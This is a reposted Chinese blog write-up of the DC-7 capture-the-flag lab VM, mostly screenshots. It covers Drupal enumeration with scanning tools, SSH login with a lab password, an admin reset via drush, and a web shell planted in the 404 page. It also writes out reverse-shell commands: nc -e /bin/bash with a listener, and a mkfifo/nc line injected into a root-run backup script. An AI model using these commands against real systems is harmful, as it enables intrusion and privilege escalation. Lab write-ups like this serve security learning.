码迷,mamicode.com
首页 > 其他好文 > 详细

DC-7靶机

时间:2020-05-07 19:28:06      阅读:80      评论:0      收藏:0      [点我收藏+]

标签:seek   style   block   roo   git   class   dmi   themes   解密   

仅供个人娱乐

靶机信息

下载地址:http://www.five86.com/downloads/DC-7.zip

一、主机扫描

技术图片

二、信息收集

技术图片
技术图片

或者

python3 cmseek.py --url http://192.168.17.134

技术图片

寻找drup相关信息 在github找到脚本

pip3 install -r requirements.txt

python3 drupwn --help

技术图片

python3 drupwn --users --nodes --modules --dfiles --themes --thread 5 enum http://192.168.17.134

技术图片

安装脚本

git clone https://github.com/droope/droopescan.git

cd droopescan

pip3 install -r requirements.txt

droopescan scan --help

技术图片

droopescan scan drupal -u http://192.168.17.134 -t 32

技术图片
技术图片

三、漏洞查找和利用

技术图片

信息收集

技术图片
技术图片

ssh 登录         

$username="dc7user";    $password="MdR3xOgB7#dW";

技术图片

信息收集

技术图片

解密邮件

技术图片
技术图片
技术图片
技术图片
技术图片

进入数据库

 

技术图片
技术图片

hash解密失败  修改admin密码

drush user-password admin --password="test"

技术图片

登录后台 信息收集

技术图片
技术图片
技术图片

wget https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

技术图片
技术图片
技术图片

编辑404

技术图片
技术图片

插入木马

技术图片
技术图片

nc -e /bin/bash192.168.17.134  4444

nc -lvvp 4444

python -c ‘import pty;pty.spawn("/bin/bash")‘

技术图片

cd /opt/scripts

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.17.129 1234 >/tmp/f \" >> backups.sh

技术图片
技术图片

得到root权限后,进入root家目录下,发现theflag.txt文件

技术图片

DC-7靶机

标签:seek   style   block   roo   git   class   dmi   themes   解密   

原文地址:https://www.cnblogs.com/bingtang123/p/12838420.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!